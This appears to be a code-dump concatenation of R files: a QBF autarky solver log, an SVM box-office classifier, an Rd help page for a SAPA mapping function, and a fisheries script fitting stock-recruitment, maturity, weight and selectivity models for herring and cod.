# list_BIC[aa,3]<-EM(y=y,k=max_k,alpha=list_BIC[aa,1],lambda=list_BIC[aa,2],size_factors<-size_factors)$BIC
# print(list_BIC[aa,])
# }
#
# max_index<-which(list_BIC[,3]==min(list_BIC[,3]))
#
# max_alpha<-list_BIC[max_index,1]
# max_lambda<-list_BIC[max_index,2]
#
#
#
#
#
#
#
#
#
#
|
c DCNF-Autarky [version 0.0.1].
c Copyright (c) 2018-2019 Swansea University.
c
c Input Clause Count: 19996
c Performing E1-Autarky iteration.
c Remaining clauses count after E-Reduction: 19995
c
c Performing E1-Autarky iteration.
c Remaining clauses count after E-Reduction: 19995
c
c Input Parameter (command line, file):
c input filename QBFLIB/Basler/terminator/stmt19_352_408.qdimacs
c output filename /tmp/dcnfAutarky.dimacs
c autarky level 1
c conformity level 0
c encoding type 2
c no.of var 5870
c no.of clauses 19996
c no.of taut cls 0
c
c Output Parameters:
c remaining no.of clauses 19995
c
c QBFLIB/Basler/terminator/stmt19_352_408.qdimacs 5870 19996 E1 [1] 0 280 5589 19995 RED
| /code/dcnf-ankit-optimized/Results/QBFLIB-2018/E1/Experiments/Basler/terminator/stmt19_352_408/stmt19_352_408.R | no_license | arey0pushpa/dcnf-autarky | R | false | false | 720 | r | c DCNF-Autarky [version 0.0.1].
c Copyright (c) 2018-2019 Swansea University.
c
c Input Clause Count: 19996
c Performing E1-Autarky iteration.
c Remaining clauses count after E-Reduction: 19995
c
c Performing E1-Autarky iteration.
c Remaining clauses count after E-Reduction: 19995
c
c Input Parameter (command line, file):
c input filename QBFLIB/Basler/terminator/stmt19_352_408.qdimacs
c output filename /tmp/dcnfAutarky.dimacs
c autarky level 1
c conformity level 0
c encoding type 2
c no.of var 5870
c no.of clauses 19996
c no.of taut cls 0
c
c Output Parameters:
c remaining no.of clauses 19995
c
c QBFLIB/Basler/terminator/stmt19_352_408.qdimacs 5870 19996 E1 [1] 0 280 5589 19995 RED
|
#rm(list=ls(all=TRUE))
library('e1071')
library(plyr)
library(rgl)
library(scatterplot3d)
AAPL = read.csv('Youtubelist.csv')
AAPL = AAPL[,-c(1,2,3,10)]#Range to process
for(i in 1:7)
AAPL = AAPL[!is.na(AAPL[,i]),]
#AAPL = AAPL[sample(nrow(AAPL),3000),]#Sampling
#AAPL = AAPL[order(AAPL$Box),]
AAPL$Youtube.Views = scale(AAPL$Youtube.Views)
#AAPL$Box = scale(AAPL$Box)
#AAPL$Budget[is.na(AAPL$Budget)] = mean(AAPL$Budget[!is.na(AAPL$Budget)])
#AAPL$Youtube.Views = scale(AAPL$Youtube.Views)
#plot(AAPL$Box)
AAPL = as.data.frame(AAPL)
np = ceiling(0.2 * nrow(AAPL))
#Y = ifelse(AAPL$Box>40000000,1,0)
AAPL$Y = c(rep(0,length(AAPL$Box)))
#ranklist = c(-1,1e7L,5e7L,1e7L,2e8L)
ranklist = c(-1,7e6L,3e7L,7e7L,1e8L)
ranklist = as.numeric(ranklist)
for(i in 2:length(ranklist))
{
AAPL$Y[AAPL$Box<=ranklist[i] & AAPL$Box>ranklist[i-1]] = i-1
}
AAPL$Y[AAPL$Box>ranklist[length(ranklist)]] = length(ranklist)
AAPL = AAPL[,-1]
test.index = sample(1:nrow(AAPL), np)
#test.index = 1:np
AAPL.test = AAPL[test.index, ]
AAPL.train = AAPL[-test.index, ]
tuned = tune.svm(Y ~ ., data = AAPL.train, gamma = 2^(-7:-5), cost = 2^(2:4))
#summary(tuned)
if(nrow(count(AAPL.train$Y))>1)
{
svm.model = svm(Y ~ ., data = AAPL.train, kernal='radial', type = 'C-classification', cost = 16, gamma = 0.03125)
#svm.model = readRDS("movie.svmodel")
svm.pred = predict(svm.model, AAPL.test[, -7])
table.svm.test = table(pred = svm.pred, true = AAPL.test[, 7])
correct.svm = sum(diag(table.svm.test) / sum(table.svm.test)) * 100
result = cbind(AAPL.test, svm.pred)
result = result[order(result$Y),]#Sorting
plot(result$svm.pred, result$Y)
for(i in 1:5)
{
plot(table(result$Genre[result$Y==i]),col='green', xlab="Genre", ylab="Number", main="Pred Box(red) vs Box(green)")
points(table(result$Genre[result$svm.pred==i]),col='red')
}
for(i in 1:5)
{
plot(table(result$MPAA[result$Y==i]),col='green', xlab="MPAA", ylab="Number", main="Pred Box(red) vs Box(green)")
points(table(result$MPAA[result$svm.pred==i]),col='red')
}
plot3d(result$Genre, result$MPAA, result$Y, main="3D scatterplot", pch=16, highlight.3d = TRUE, type="h", col=c('red','green','blue'))
plot3d(result$Genre, result$MPAA[result$MPAA=="PG-13"], result$Y, main="3D scatterplot", pch=16, highlight.3d = TRUE, type="h", col=c('red','green','blue'))
}else{
print("Assert: There is only one label.")
}
| /Odds_Ends/test6.R | no_license | peter0749/Project_R | R | false | false | 2,401 | r | #rm(list=ls(all=TRUE))
library('e1071')
library(plyr)
library(rgl)
library(scatterplot3d)
AAPL = read.csv('Youtubelist.csv')
AAPL = AAPL[,-c(1,2,3,10)]#Range to process
for(i in 1:7)
AAPL = AAPL[!is.na(AAPL[,i]),]
#AAPL = AAPL[sample(nrow(AAPL),3000),]#Sampling
#AAPL = AAPL[order(AAPL$Box),]
AAPL$Youtube.Views = scale(AAPL$Youtube.Views)
#AAPL$Box = scale(AAPL$Box)
#AAPL$Budget[is.na(AAPL$Budget)] = mean(AAPL$Budget[!is.na(AAPL$Budget)])
#AAPL$Youtube.Views = scale(AAPL$Youtube.Views)
#plot(AAPL$Box)
AAPL = as.data.frame(AAPL)
np = ceiling(0.2 * nrow(AAPL))
#Y = ifelse(AAPL$Box>40000000,1,0)
AAPL$Y = c(rep(0,length(AAPL$Box)))
#ranklist = c(-1,1e7L,5e7L,1e7L,2e8L)
ranklist = c(-1,7e6L,3e7L,7e7L,1e8L)
ranklist = as.numeric(ranklist)
for(i in 2:length(ranklist))
{
AAPL$Y[AAPL$Box<=ranklist[i] & AAPL$Box>ranklist[i-1]] = i-1
}
AAPL$Y[AAPL$Box>ranklist[length(ranklist)]] = length(ranklist)
AAPL = AAPL[,-1]
test.index = sample(1:nrow(AAPL), np)
#test.index = 1:np
AAPL.test = AAPL[test.index, ]
AAPL.train = AAPL[-test.index, ]
tuned = tune.svm(Y ~ ., data = AAPL.train, gamma = 2^(-7:-5), cost = 2^(2:4))
#summary(tuned)
if(nrow(count(AAPL.train$Y))>1)
{
svm.model = svm(Y ~ ., data = AAPL.train, kernal='radial', type = 'C-classification', cost = 16, gamma = 0.03125)
#svm.model = readRDS("movie.svmodel")
svm.pred = predict(svm.model, AAPL.test[, -7])
table.svm.test = table(pred = svm.pred, true = AAPL.test[, 7])
correct.svm = sum(diag(table.svm.test) / sum(table.svm.test)) * 100
result = cbind(AAPL.test, svm.pred)
result = result[order(result$Y),]#Sorting
plot(result$svm.pred, result$Y)
for(i in 1:5)
{
plot(table(result$Genre[result$Y==i]),col='green', xlab="Genre", ylab="Number", main="Pred Box(red) vs Box(green)")
points(table(result$Genre[result$svm.pred==i]),col='red')
}
for(i in 1:5)
{
plot(table(result$MPAA[result$Y==i]),col='green', xlab="MPAA", ylab="Number", main="Pred Box(red) vs Box(green)")
points(table(result$MPAA[result$svm.pred==i]),col='red')
}
plot3d(result$Genre, result$MPAA, result$Y, main="3D scatterplot", pch=16, highlight.3d = TRUE, type="h", col=c('red','green','blue'))
plot3d(result$Genre, result$MPAA[result$MPAA=="PG-13"], result$Y, main="3D scatterplot", pch=16, highlight.3d = TRUE, type="h", col=c('red','green','blue'))
}else{
print("Assert: There is only one label.")
}
|
\name{sapa.combined}
\alias{sapa.combined}
%- Also NEED an '\alias' for EACH other topic documented here.
\title{
sapa.combined}
\description{
Returns the object for remapping with different parameters}
\usage{
sapa.combined(df, DV, gridsize = 300, database = "usa", regions = ".", average = TRUE, size = 11, miss = 0.05, ncols = NULL, main = "SAPA combined")
}
%- maybe also 'usage' for other objects documented here.
\arguments{
\item{df}{
%% ~~Describe \code{df} here~~
}
\item{DV}{
%% ~~Describe \code{DV} here~~
}
\item{gridsize}{
%% ~~Describe \code{gridsize} here~~
}
\item{database}{
%% ~~Describe \code{database} here~~
}
\item{regions}{
%% ~~Describe \code{regions} here~~
}
\item{average}{
%% ~~Describe \code{average} here~~
}
\item{size}{
%% ~~Describe \code{size} here~~
}
\item{miss}{
%% ~~Describe \code{miss} here~~
}
\item{ncols}{
%% ~~Describe \code{ncols} here~~
}
\item{main}{
%% ~~Describe \code{main} here~~
}
}
\details{
%% ~~ If necessary, more details than the description above ~~
}
\value{
%% ~Describe the value returned
%% If it is a LIST, use
%% \item{comp1 }{Description of 'comp1'}
%% \item{comp2 }{Description of 'comp2'}
%% ...
}
\references{
https://sapa-project.org/r/}
\author{
William Revelle <revelle@northwestern.edu>
Maintainer: Jason A. French
}
\note{
Please file bugs at https://github.com/frenchja/SAPATools/issues.}
%% ~Make other sections like Warning with \section{Warning }{....} ~
\seealso{
%% ~~objects to See Also as \code{\link{help}}, ~~~
}
\examples{
# my.zips <- sapa.zip(IRT.scores)
# g <- sapa.combined(my.zips,'g',gridsize=400,main='ICAR IQ scores from the SAPA project')
}
| /man/sapa.combined.Rd | no_license | frenchja/SAPATools | R | false | false | 1,703 | rd | \name{sapa.combined}
\alias{sapa.combined}
%- Also NEED an '\alias' for EACH other topic documented here.
\title{
sapa.combined}
\description{
Returns the object for remapping with different parameters}
\usage{
sapa.combined(df, DV, gridsize = 300, database = "usa", regions = ".", average = TRUE, size = 11, miss = 0.05, ncols = NULL, main = "SAPA combined")
}
%- maybe also 'usage' for other objects documented here.
\arguments{
\item{df}{
%% ~~Describe \code{df} here~~
}
\item{DV}{
%% ~~Describe \code{DV} here~~
}
\item{gridsize}{
%% ~~Describe \code{gridsize} here~~
}
\item{database}{
%% ~~Describe \code{database} here~~
}
\item{regions}{
%% ~~Describe \code{regions} here~~
}
\item{average}{
%% ~~Describe \code{average} here~~
}
\item{size}{
%% ~~Describe \code{size} here~~
}
\item{miss}{
%% ~~Describe \code{miss} here~~
}
\item{ncols}{
%% ~~Describe \code{ncols} here~~
}
\item{main}{
%% ~~Describe \code{main} here~~
}
}
\details{
%% ~~ If necessary, more details than the description above ~~
}
\value{
%% ~Describe the value returned
%% If it is a LIST, use
%% \item{comp1 }{Description of 'comp1'}
%% \item{comp2 }{Description of 'comp2'}
%% ...
}
\references{
https://sapa-project.org/r/}
\author{
William Revelle <revelle@northwestern.edu>
Maintainer: Jason A. French
}
\note{
Please file bugs at https://github.com/frenchja/SAPATools/issues.}
%% ~Make other sections like Warning with \section{Warning }{....} ~
\seealso{
%% ~~objects to See Also as \code{\link{help}}, ~~~
}
\examples{
# my.zips <- sapa.zip(IRT.scores)
# g <- sapa.combined(my.zips,'g',gridsize=400,main='ICAR IQ scores from the SAPA project')
}
|
library(tidyverse)
library(gridExtra)
library(ggplot2)
library(dplyr)
library(gridExtra)
library(reshape2)
library(openxlsx)
library(TMB)
library(here)
library(png)
#####------------ NOTES -------------------#####
# - nll for parameter estimation is log-likelihood
# - SSB is real numbers & SSB1 is theoretical numbers
#------------------------- DATASETS -------------------------------#
nsshass <-read.xlsx(here('Scripts_R/NSSH assessment.xlsx'),sheet=1)
nsshmaturity<-read.xlsx(here('Scripts/NSSH assessment.xlsx'),sheet=2)
nsshweight <- read.xlsx(here('Scripts/NSSH assessment.xlsx'), sheet=3)
nsshfmort<-read.xlsx(here('Scripts/NSSH assessment.xlsx'),sheet=4)
codass <-read.xlsx(here('Scripts_R/Cod_assessment.xlsx'),sheet=1)
#for biased plotting codass <- codass[-74,]
# colnames(codass)[5] <- "SSB"
# colnames(codass)[6] <- "SSBhigh"
# colnames(codass)[7] <- "SSBlow"
codmaturity<-read.xlsx(here('Scripts/Cod_assessment.xlsx'),sheet=2)
codweight <- read.xlsx(here('Scripts/Cod_assessment.xlsx'), sheet=3)
codfmort<-read.xlsx(here('Scripts/Cod_assessment.xlsx'),sheet=4)
#for biased plotting
#redfishass <-read.xlsx(here('Scripts/S.mentella_assessment.xlsx'),sheet=1) # Advice2020
# colnames(redfishass)[3] <- "SSB"
#colnames(redfishass)[4] <- "SSBhigh"
#colnames(redfishass)[5] <- "SSBlow"
redfishass <-read.xlsx(here('Scripts_R/S.mentella_assessment.xlsx'),sheet=2) # Advice2018
redfishass2 <-read.xlsx(here('Scripts_R/S.mentella_assessment.xlsx'),sheet=3) # AFWG2019
redfishmaturity<-read.xlsx(here('Scripts_R/S.mentella_assessment.xlsx'),sheet=4)
redfishweight <- read.xlsx(here('Scripts_R/S.mentella_assessment.xlsx'), sheet=5)
redfishfmort<-read.xlsx(here('Scripts_R/S.mentella_assessment.xlsx'),sheet=6)
#######################################################################
######--------------- NSSH --------------- #############
#######################################################################
#### Setting up general parameters
age <- c(2:15)
recage<-2
start.rec <- mean(nsshass$Rec.age2)*1000
#### Recruitment: important to correct for the rec.age offset ####
tsl<-length(nsshass$Year)
Rec <- nsshass$Rec.age2[(recage+1):tsl]*1000 #assessment recruitment
SSB <- nsshass$SSB[1:(tsl-(recage))] # assessment ssb
Rec <- Rec/1000000000 # for plotting
SSB <- SSB/1000000 #for plotting
## 5. Ricker
data<-list()
data$SSB<-SSB #c(0,SSB)
data$Rec<-Rec #c(0,rep(mean(Rec),length(Rec)))
#nlsricker<- nls(Rec~alpha*SSB*exp(beta*SSB),data=data,start=list(alpha=1e7,beta=1e-7))
nlsrssb <- nls(log(Rec/SSB) ~ alpha+(beta*SSB), data=data,start=list(alpha=5,beta=-1))
alphar <- summary(nlsrssb)$coefficients[1]
betar <- summary(nlsrssb)$coefficients[2]
#Recruitment5 <- exp(alpha)*data$SSB*exp(beta*data$SSB)
RSSB5 <- alphar +betar *data$SSB
ricker.sd<-sd(residuals(nlsrssb))
ricker.mean<-mean(residuals(nlsrssb))
autocorrelation1<-acf(residuals(nlsrssb))
AR1par<-autocorrelation1$acf[2]
Rvar.std <- mean(exp(rnorm(1e6,0,ricker.sd)))
SSB1 <- seq(0,9e6,1e5) # SSB1 theoretical numbers to test alpha & beta estimates
SSB1 <- SSB1/1000000 #for plotting
nsshRecruitment5 <- exp(alphar)*SSB1*exp(betar *SSB1) #- Deterministic stock-recruitment version
Rvariation<-rnorm(length(SSB1),0,ricker.sd) #- Norm. dist error term (on log-scale)
Recruitment5.1 <- exp(alphar)*SSB1*exp(betar *SSB1) * exp(Rvariation)/Rvar.std #- Stochasticy term
Rvariationacf<-c(Rvariation[1],AR1par*Rvariation[1:(length(SSB1)-1)]+Rvariation[2:length(SSB1)]) # autocorrelation
Recruitment5.2 <- exp(alphar)*SSB1 *exp(betar *SSB1) *exp(Rvariationacf)/Rvar.std #- stochasticity term
plot(nsshRecruitment5~SSB1,type="l",col="red") #xlim=c(0, 9), ylim=c(0, 60), xlab="SSB1 million t", ylab="Rec billions") #,ylim=c(0,7e7))
points(Recruitment5.1~SSB1,col="blue",pch=1)
points(Recruitment5.2~SSB1,col="purple",pch=2)
points(Rec~SSB,pch=16)
##---- Compare with assessed SSB --- SSB real data
Recruitment5 <- exp(alphar)*SSB*exp(betar*SSB) #- Deterministic stock-recruitment version
Rvariation<-rnorm(length(SSB),0,ricker.sd) #- Norm. dist. error term (on log-scale)
Recruitment5.1 <- exp(alphar)*SSB *exp(betar *SSB) *exp(Rvariation)/Rvar.std #- Stochasticity
Rvariationacf<-c(Rvariation[1],AR1par*Rvariation[1:(length(SSB)-1)]+Rvariation[2:length(SSB)]) #- AR1 autocorr. error term
Recruitment5.2 <- exp(alphar)*SSB *exp(betar *SSB) *exp(Rvariationacf)/Rvar.std #- Stochasticity
plot(Recruitment5~SSB,type="l",col="red")
points(Recruitment5.1~SSB,col="blue",pch=1)
points(Recruitment5.2~SSB,col="purple",pch=2)
points(Rec~SSB,pch=16)
c(sum((Rec-Recruitment5)^2),sum((Rec-Recruitment5.1)^2),sum((Rec-Recruitment5.2)^2))
###### BH (trying again 2/2 2022)
# 1/R = beta + alpha * 1/SSB algebraic transformation of BH
tsl<-length(nsshass$Year)
Rec <- nsshass$Rec.age2[(recage+1):tsl]*1000 #assessment recruitment
SSB <- nsshass$SSB[1:(tsl-(recage))] # assessment ssb
Rec <- Rec/1000000000 # for plotting
SSB <- SSB/1000000 #for plotting
data<-list()
data$SSB<-SSB #c(0,SSB)
data$Rec<-Rec #c(0,rep(mean(Rec),length(Rec)))
## BH algebraic transformation, estimating base of ICES data
bhnlsrssb <- nls(1/Rec ~ beta + alpha * (1/SSB), data=data, start = list(alpha=5, beta=-1))
alphabh <- summary(bhnlsrssb)$coefficients[1]
betabh <- summary(bhnlsrssb)$coefficients[2]
bh.sd<-sd(residuals(bhnlsrssb))
bhvar.std <- mean(exp(rnorm(1e6,0, bh.sd)))
bhvariation<- rnorm(length(SSB1),0,bh.sd)
SSB1 <- seq(0, 9e6, 1e5) # SSB1 theoretical numbers to test alpha & beta estimates
SSB1 <- SSB1/1000000 #for plotting
nsshRecruitment6 <- 1/(betabh + alphabh * 1/SSB1) # testing the alpha and beta, works!
Recruitment6.1 <- 1/(betabh + alphabh * 1/SSB1) * (1/(bhvariation))/bh.sd #- Stochasticy term
plot(nsshRecruitment6 ~ SSB1,type="l",col="red")
####### dont use any of this
## BH - alpha and beta estimated in TMB - 2 options ##
#Recruitment6 <- exp(alphabh +log(SSB)-log(exp(betabh)*SSB))
#Recruitment6 <- (alphabh*SSB)/(1+betabh*SSB) ### dont use this
#plot(Recruitment6 ~ SSB,type="l",col="red")
#----- Plotting all ---- #
rec.vector <- c(nsshRecruitment5, nsshRecruitment6)
type <-rep(c("Ricker5", "BH"),each=length(nsshRecruitment5))
rec.df <- data.frame(Type=type, SSB=rep(SSB1,2),Rec=rec.vector)
rec.df %>% ggplot(aes(x=SSB,y=Rec, color=Type)) + geom_line(size=1.5) +
scale_color_brewer(palette="Accent") +
theme_bw() + theme(panel.background = element_blank(),
panel.grid.major = element_blank(), panel.grid.minor = element_blank(),
axis.line = element_line(colour = "black"), axis.text.y = element_text(size=15),
axis.text.x = element_text(size=15), axis.title.x = element_text(size=20),
axis.title.y = element_text(size=20))
##### Maturity #####
maturity2 <-melt(nsshmaturity,id.vars="Year")
maturity2$Age <- rep(0:15,each=dim(nsshmaturity)[1])
maturity3 <- maturity2 %>% filter(Year>1987 & Age>1)
maturity3 %>%
ggplot(aes(x=Age,y=value,color=as.factor(Year))) + geom_line()
compile('Scripts/maturity.cpp')
dyn.load(dynlib('Scripts/maturity'))
data<-list()
data$age<-maturity3$Age # changed it from maturity2 to maturity3 to use correct filter
data$mprop<-maturity3$value
param <- list()
param$a50 <- 4
param$env <- .2
param$logsigma <-0
obj <- MakeADFun(data, param,DLL="maturity") # MakeADFun - automatic differentiation function
opt <- nlminb(obj$par, obj$fn, obj$gr)
## parameter estimates
a50 <- opt$par[1]
env <- opt$par[2]
maturity <- round(1/(1+exp(-((age-a50)/env))),2) ## used in simulation
maturity3$mprop.est <- 1/(1+exp(-((maturity3$Age-a50)/env)))
nsshmat <- maturity3 %>%
ggplot(aes(x=Age,y=value)) + geom_point(size= 2.5) +
geom_line(inherit.aes=F,aes(x=Age,y=mprop.est), size= 0.6) + labs(y= "Maturity", x= "Age")+ theme_bw() + theme(panel.background = element_blank(), panel.grid.major = element_blank(), panel.grid.minor = element_blank(), axis.line = element_line(colour = "black"), axis.text.y = element_text(size=20), axis.text.x = element_text(size=20), axis.title.x = element_text(size=30), axis.title.y = element_text(size=30)) + labs(tag="a")
##### Weights #####
weights2 <-melt(nsshweight,id.vars="Year")
weights2$Age <- rep(0:15,each=dim(nsshweight)[1])
weights3 <- weights2 %>% filter(Year>1987 & Age>1)
weights3 %>%
ggplot(aes(x=Age,y=value,color=as.factor(Year))) + geom_line()
compile('Scripts/weight.cpp')
dyn.load(dynlib('Scripts/weight'))
data<-list()
data$age<-weights3$Age # changed it from weights2 to weights3 to use correct filter
data$wprop<-weights3$value
param <- list()
param$k <- 0.4
param$b <- 3
param$Winf <- 0.4
param$logsigma <- 0
obj <- MakeADFun(data, param,DLL="weight")
opt <- nlminb(obj$par, obj$fn, obj$gr)
## parameter estimates
k <- opt$par[1]
b <- opt$par[2]
Winf <- opt$par[3]
weights <- Winf * (1-exp(-k * age))^b ### used in simulation
weights3$wprop.est <- Winf * (1-exp(-k * weights3$Age))^b
nsshwei <- weights3 %>%
ggplot(aes(x=Age,y=value)) + geom_point(size= 2.5) +
geom_line(inherit.aes=F,aes(x=Age,y=wprop.est), size= 0.6) + labs(y= "Weight (kg)", x= "Age") + theme_bw() + theme(panel.background = element_blank(), panel.grid.major = element_blank(), panel.grid.minor = element_blank(), axis.line = element_line(colour = "black"), axis.text.y = element_text(size=20), axis.text.x = element_text(size=20), axis.title.x = element_text(size=30), axis.title.y = element_text(size=30))+ labs(tag="a")
##### Selectivity #####
fmort2<-melt(nsshfmort,id.vars="Year")
fmort2$Age <- rep(2:12,each=dim(nsshfmort)[1])
fmort2 %>%
ggplot(aes(x=Age,y=value, color=as.factor(Year))) + geom_point()
### ad hoc fix: everything above age 5 is fully selected
fmort2 <- fmort2 %>% mutate(sel=ifelse(Age>5,1,value/max(value[Age<5])),sel=ifelse(sel>1,1,sel))
fmort2 %>%
ggplot(aes(x=Age,y=sel, color=as.factor(Year))) + geom_point()
### using aggregated data
fmort3 <- fmort2 %>% group_by(Age) %>% summarise(sel=mean(sel))
### ad hoc fix: everything below age 3 is not fished
fmort3 <- fmort3 %>% mutate(sel=case_when(Age<3 ~ 0,TRUE ~ sel))
compile('Scripts/sel.cpp')
dyn.load(dynlib('Scripts/sel'))
data<-list()
data$age<-fmort3$Age
data$sel<-fmort3$sel
param <- list()
param$s50 <- 7
param$ss <- 1
param$logsigma <-0
obj <- MakeADFun(data, param,DLL="sel")
opt <- nlminb(obj$par, obj$fn, obj$gr)
## parameter estimates
s50 <- opt$par[1]
ss <- opt$par[2]
Fsel <- 1/(1+exp(-((age-s50)/ss))) ### used in simulation
fmort3$sel.est <- 1/(1+exp(-((fmort3$Age-s50)/ss)))
nsshfsel <- fmort3 %>%
ggplot(aes(x=Age,y=sel)) + geom_point(size= 2.5) +
geom_line(inherit.aes=F,aes(x=Age,y=sel.est), size= 0.6)+ labs(y= "Fishing selectivity", x= "Age") + theme_bw() + theme(panel.background = element_blank(), panel.grid.major = element_blank(), panel.grid.minor = element_blank(), axis.line = element_line(colour = "black"), axis.text.y = element_text(size=20), axis.text.x = element_text(size=20), axis.title.x = element_text(size=20), axis.title.y = element_text(size=20))+ labs(tag="a") + scale_x_continuous(breaks=c(2,6, 10))
#######################################################################
######--------------- NEA COD --------------- #############
#######################################################################
age <- c(3:15) ## maximum age 3-15
recage<- 3
start.rec <- mean(codass$Rec.age3)*1000
#### Recruitment: important to correct for the rec.age offset ####
tsl<-length(codass$Year)
Rec <- codass$Rec.age3[(recage+1):tsl]*1000
SSB <- codass$SSBtonnes[1:(tsl-(recage))]
Rec <- Rec/1000000000 # for plotting
SSB <- SSB/1000000 #for plotting
## 5. Ricker
data<-list()
data$SSB<-SSB #c(0,SSB)
data$Rec<-Rec #c(0,rep(mean(Rec),length(Rec)))
#nlsricker<- nls(Rec~alpha*SSB*exp(beta*SSB),data=data,start=list(alpha=1e7,beta=1e-7))
nlsrssb <- nls(log(Rec/SSB) ~ alpha+(beta*SSB),data=data,start=list(alpha=5,beta=-1), na.action = na.omit)
alphar <- summary(nlsrssb)$coefficients[1]
betar <- summary(nlsrssb)$coefficients[2]
#Recruitment5 <- exp(alpha)*data$SSB*exp(beta*data$SSB)
RSSB5 <- alphar +betar *data$SSB
ricker.sd<-sd(residuals(nlsrssb))
ricker.mean<-mean(residuals(nlsrssb))
autocorrelation<-acf(residuals(nlsrssb))
AR1par <-autocorrelation$acf[2]
# Theoretical SSB1
SSB1<-seq(0, 6e6, 1e3)
SSB1<- SSB1/1000000 # for plotting
Recruitment5 <- exp(alphar)*SSB1*exp(betar *SSB1) #Deterministic stock-recruitment version
Rvariation<-rnorm(length(SSB1),0,ricker.sd) #Norm. dist. error term (on log-scale)
Recruitment5.1 <- exp(alphar)*SSB1*exp(betar *SSB1) * exp(Rvariation) #- Stochasticity
Rvariationacf<-c(Rvariation[1],AR1par*Rvariation[1:(length(SSB1)-1)]+Rvariation[2:length(SSB1)]) #- autocorrelation
Recruitment5.2 <- exp(alphar)*SSB1 *exp(betar *SSB1) *exp(Rvariationacf) #- stochasticity
plot(Recruitment5~SSB1,type="l",col="red", xlim=c(0,6), ylim=c(0,3), xlab="SSB1 million t", ylab="Rec billions")
points(Recruitment5.1~SSB1,col="blue",pch=1)
points(Recruitment5.2~SSB1,col="purple",pch=2)
points(Rec~SSB,pch=16)
##---- Compare with assessed SSB --- SSB real data
Recruitment5 <- exp(alphar)*SSB*exp(betar*SSB) #- Deterministic stock-recruitment version
Rvariation<-rnorm(length(SSB),0,ricker.sd) #- Norm. dist. error term (on log-scale)
Recruitment5.1 <- exp(alphar)*SSB*exp(betar *SSB) * exp(Rvariation) #- stochasticity
Rvariationacf<-c(Rvariation[1],AR1par*Rvariation[1:(length(SSB)-1)]+Rvariation[2:length(SSB)]) #- AR1 autocorr to error term
Recruitment5.2 <- exp(alphar)*SSB *exp(betar *SSB) *exp(Rvariationacf) #- stochasticity
plot(Recruitment5~SSB,col="red", type="l", xlab="SSB1 million t", ylab="Rec billions")
points(Recruitment5.1~SSB,col="blue",pch=1)
points(Recruitment5.2~SSB,col="purple",pch=2)
points(Rec~SSB,pch=16)
c(sum((Rec-Recruitment5)^2),sum((Rec-Recruitment5.1)^2),sum((Rec-Recruitment5.2)^2))
###### BH (trying again 2/2 2022)
# 1/R = beta + alpha * 1/SSB algebraic transformation of BH
#run first lines of NEA rec to load data
data<-list()
data$SSB<-SSB #c(0,SSB)
data$Rec<-Rec #c(0,rep(mean(Rec),length(Rec)))
## BH algebraic transformation, estimating base of ICES data
bhalge <- nls(1/Rec ~ beta + alpha * (1/SSB), data=data, start = list(alpha=5, beta=-1))
alphabh <- summary(bhalge)$coefficients[1]
betabh <- summary(bhalge)$coefficients[2]
# SSB1 theoretical numbers to test alpha & beta estimates
SSB1 <- seq(0,9e6,1e5)
#SSB1 <- SSB1/1000000 #for plotting
codRec6 <- betabh + alphabh * (1/SSB) # testing the alpha and beta, works!
plot(1/codRec6 ~ SSB,type="l",col="red")
####### dont use any of this
## BH - alpha and beta estimated in TMB - 2 options ##
#Recruitment6 <- exp(alphabh +log(SSB)-log(exp(betabh)*SSB))
#Recruitment6 <- (alphabh*SSB)/(1+betabh*SSB) ### dont use this
#plot(Recruitment6 ~ SSB,type="l",col="red")
## plot
rec.vector<-c(Rec,Recruitment5,Recruitment5.1, Recruitment5.2)
type<-rep(c("Real","Ricker","Ricker5.1", "Ricker5.2"),each=length(Rec))
rec.df<-data.frame(Type=type,SSB=rep(SSB,4),Rec=rec.vector)
rec.df %>% ggplot(aes(x=SSB,y=Rec,color=Type)) + geom_point(size=3) +
scale_color_brewer(palette="Accent") + theme_bw()
##### BEVERTON-HOLT
# ## 6. BH - NB: fit depends heavily on starting values and sucks (tends to become constant)
# compile('Scripts/bh.cpp')
# dyn.load(dynlib('Scripts/bh'))
#
# data<-list()
# data$ssb<-SSB
# data$logR<-log(Rec)
#
# param <- list()
# param$loga <- 1
# param$logb <- 1
# param$logsigma <-0
#
# obj <- MakeADFun(data, param,DLL="bh")
# optbh <- nlminb(obj$par, obj$fn, obj$gr)
#
# Recruitment6 <- (optbh$par[1]*SSB)/(1+optbh$par[2]*SSB) #exp(optbh$par[1]+log(SSB)-log(exp(optbh$par[2])*SSB))
#
# alphabh <- optbh$par[1]
# betabh <- optbh$par[2]
#
#
# plot(Recruitment6~SSB, col="red", pch=3)
#
# ## plot
# rec.vector<-c(Rec, Recruitment5, Recruitment6)
# type<-rep(c("Real","Ricker","BH"),each=length(Rec))
# rec.df<-data.frame(Type=type,SSB=rep(SSB,3),Rec=rec.vector)
#
# rec.df %>% ggplot(aes(x=SSB,y=Rec,color=Type)) + geom_point(size=3) +
# scale_color_brewer(palette="Accent") + theme_bw()
##### BEVERTON-HOLT continued (another way)
data<-list()
data$SSB<-SSB #c(0,SSB)
data$Rec<-Rec #c(0,rep(mean(Rec),length(Rec)))
nlsrssb <- nls(1/Rec ~ beta + alpha / SSB, data=data,start=list(alpha=5,beta=-1))
alphabh <- summary(nlsrssb)$coefficients[1]
betabh <- summary(nlsrssb)$coefficients[2]
#Recruitment6 <- exp(alpha)*data$SSB*exp(beta*data$SSB)
RSSB6 <- SSB/(alphabh +betabh *SSB)
bh.sd <- 1/sd(residuals(nlsrssb))
bh.mean <- mean(residuals(nlsrssb))
autocorrelation <- acf(residuals(nlsrssb))
AR1par <- autocorrelation$acf[2]
# Theoretical SSB1
SSB1<-seq(0, 4e6, 1e5)
Recruitment6 <- SSB1/(alphabh +betabh *SSB1) #Deterministic stock-recruitment version
Rvariation<-rnorm(length(SSB1),0,bh.sd) #Norm. dist. errorterm (on log-scale)
Recruitment6.1 <- SSB1/(alphabh +betabh *SSB1) + Rvariation #- stochasticity
Rvariationacf<-c(Rvariation[1],AR1par*Rvariation[1:(length(SSB1)-1)]+Rvariation[2:length(SSB1)]) #- AR1 autocorr to error term
Recruitment6.2 <- SSB1/(alphabh +betabh *SSB1) + Rvariationacf #- stochasticity
plot(Recruitment6~SSB1,col="red", type="l",ylim=c(0,max(Rec)*1.2))
points(Recruitment6.1~SSB1,col="blue",pch=1)
points(Recruitment6.2~SSB1,col="purple",pch=2)
points(Rec~SSB,pch=16)
##---- Compare with assessed SSB --- SSB real data
Recruitment6 <- SSB/(alphabh +betabh *SSB) #Deterministic stock-recruitment version
Rvariation<-rnorm(length(SSB),0,bh.sd) #Norm. dist. errorterm (on log-scale)
